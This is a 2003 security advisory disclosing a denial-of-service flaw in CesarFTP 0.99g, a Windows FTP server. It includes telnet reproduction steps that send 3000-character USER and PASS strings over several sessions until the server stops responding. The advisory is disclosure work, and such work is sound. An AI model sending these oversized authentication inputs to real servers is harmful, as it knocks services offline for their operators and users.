Tripbit Security Advisory
TA-250403 


Severity: 
Medium/High
Application: 
CesarFTP Sever 0.99g
Platform: 
Windows
Class: 
Denial of Service
Release Date: 
April 25th, 2003
Vendor: 
http://www.aclogic.com


Overview

CesarFTP a FTP server for Windows has problems with the authentification. When the buffers of username and password are too big, it is vulnerable for a Denial of Service Attack.

• Details
First FTP session
C:\> ftp <host> <port>
Connection with 80.146.140.248 was established.
220 CesarFTP 0.99g Server Welcome !
User (80.146.140.248:(none)): username
Password: ******
ftp>


First Telnet session

C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Second telnet session
C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Third telnet session
C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Typing 'ls' now for example in the first ftp session won't do anything, because the server doesn't process the command. We may also open a second FTP session but won't be able to connect to the server.

• Recommendation
No solution for the moment.

Vendor Response
The vendor has been notified but no answer to this report.

• Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an 'AS IS' condition. There are 'NO' warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

• Additional information
This vulnerability has been found and researched by:

posidron posidron@tripbit.org

rushjo rushjo@tripbit.org

• Availability
You can find the latest version of this warning under the following URL:

http://www.tripbit.org/advisories/TA-250403.html